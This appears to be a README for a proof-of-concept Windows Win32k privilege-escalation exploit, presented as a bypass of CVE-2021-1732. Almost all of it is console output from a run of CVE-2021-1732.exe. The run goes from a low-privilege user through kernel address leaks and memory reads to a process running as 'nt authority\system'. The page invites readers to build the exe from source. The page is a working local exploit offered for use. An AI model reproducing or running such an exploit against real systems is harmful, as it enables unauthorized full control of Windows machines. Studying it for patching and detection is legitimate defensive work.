Win32k Elevation of Privilege Vulnerability

The Win32k elevation of privilege vulnerability was fixed this month as part of the January 2022 Patch Tuesday. It is the result of a bypass for the earlier CVE-2021-1732 flaw that allows anyone to gain admin privileges in Windows 10.
Build your own .exe from source.
CVE-2021-1732.exe whoami
Microsoft Windows [Version 10.0.17763.107]
(c) Microsoft Corporation. All rights reserved.
C:\Users\lowpriv> net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
JohnDo
The command completed successfully.
C:\Users\lowpriv> whoami
desktop-qiv0pbc\lowpriv
C:\temp>CVE-2021-1732.exe whoami
CreateWnd
Hwnd:000b014a qwfirstEntryDesktop=000001966C345110
BaseAddress:000001966C345000 RegionSize=:000000000001A000
Hwnd:00050406 qwfirstEntryDesktop=000001966C3431C0
BaseAddress:000001966C343000 RegionSize=:000000000001C000
Hwnd:000903b2 qwfirstEntryDesktop=000001966C342A20
BaseAddress:000001966C342000 RegionSize=:000000000001D000
Hwnd:000300d8 qwfirstEntryDesktop=000001966C342B70
BaseAddress:000001966C342000 RegionSize=:000000000001D000
Hwnd:0013016c qwfirstEntryDesktop=000001966C341B90
BaseAddress:000001966C341000 RegionSize=:000000000001E000
Hwnd:00050414 qwfirstEntryDesktop=000001966C341CE0
BaseAddress:000001966C341000 RegionSize=:000000000001E000
Hwnd:0005017c qwfirstEntryDesktop=000001966C341E30
BaseAddress:000001966C341000 RegionSize=:000000000001E000
Hwnd:000502da qwfirstEntryDesktop=000001966C356830
BaseAddress:000001966C356000 RegionSize=:0000000000009000
Hwnd:00020384 qwfirstEntryDesktop=000001966C356980
BaseAddress:000001966C356000 RegionSize=:0000000000009000
Hwnd:000203ac qwfirstEntryDesktop=000001966C356AD0
BaseAddress:000001966C356000 RegionSize=:0000000000009000
Min BaseAddress:000001966C341000 RegionSize=:000000000001E000
realMagicHwnd=00000000000303AC
Free ExtraBytes:000000000000124D
set ExtraData == 00000000000431C0
Free ExtraBytes:000000000000124D
dwRet=000000000000FA90
tagWndMin_offset_0x128=000000000000FA90
g_qwvuln=FFFFB73700826960
qwFrist read=FFFFB73700831E70
qwSecond read=FFFFC98914160810
qwSecond read=FFFFB73701A00000
qwFourth read=FFFFB737017F8010
qwFifth read=FFFFC989207F2080
qwSixth read=FFFFC98921421300
[*] Trying to execute whoami as SYSTEM
[+] ProcessCreated with pid 11296!
===============================
nt authority\system